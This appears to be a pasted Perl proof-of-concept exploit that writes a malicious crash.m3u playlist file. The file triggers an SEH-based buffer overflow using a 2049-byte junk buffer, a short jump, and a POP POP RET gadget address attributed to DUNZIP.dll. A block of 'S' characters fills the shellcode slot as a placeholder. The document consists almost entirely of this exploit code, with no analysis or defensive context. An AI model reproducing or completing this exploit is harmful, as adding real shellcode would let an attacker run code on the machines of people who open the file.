#!/usr/bin/perl#[ BoF ][Next SEH][SEH Handler]#[ \x41x2049 ][

1. #!/usr/bin/perl
2.  
3. #[ BoF ][Next SEH][SEH Handler]
4. #[ \x41x2049 ][ \x42x4 ][ \xccx4 ]
5. my $bof="\x41" x 2049; # Buffer Over Flow
6. #my $nseh="\xeb\x16\x90\x90"; # JMP 16 bytes
7. my $nseh="\xeb\x20\x90\x90"; # JMP 20 bytes
8. my $seh= "\x36\x01\x01\x30" x 4; # 0x30010136 EDI=POP , ESI=POP , RET DUNZIP.dll
9. my $nop="\x90" x 12; # Null bytes
10. my $shellcode ="\x53" x 315; # S x 315 byte, as shellcode
11.  
12. my $exploit= $bof.$nseh.$seh.$nop.$shellcode;
13.  
14.  
15. ###################################################################
16. open(myfile,'>> crash.m3u');
17. print myfile $exploit;
18. ###################################################################